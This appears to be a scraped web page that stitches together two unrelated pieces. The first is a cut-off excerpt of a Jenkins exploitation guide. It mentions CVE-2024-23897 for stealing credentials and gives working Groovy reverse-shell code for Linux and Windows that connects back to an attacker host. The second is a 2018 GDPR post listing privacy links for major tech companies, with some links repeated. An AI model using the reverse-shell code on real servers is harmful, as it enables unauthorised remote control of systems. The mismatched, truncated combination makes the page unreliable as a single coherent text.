Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
So, May 2018 was a remarkable month in the world of data security. European GDPR is now in effect and almost all tech giants are adjusting themselves in order to comply with the data privacy standards.
I have consolidated the Privacy policies of the top 5 companies and the link for adjusting/controlling your data privacy. Review your privacy settings and control your own privacy.
Adjust Privacy Settings : https://myaccount.google.com/intro/privacy
Privacy Policy : https://www.facebook.com/privacy/explanation
Adjust Privacy Setting : https://www.facebook.com/settings?tab=privacy
Adjust Privacy Setting : https://www.facebook.com/settings?tab=privacy
Adjust Privacy Settings : https://help.instagram.com/196883487377501
Yahoo
Privacy Policy : https://policies.oath.com/ie/en/oath/privacy/index.htmlAdjust Privacy Settings : https://policies.oath.com/us/en/oath/privacy/controls/index.html
Adjust Privacy Settings : https://twitter.com/settings/account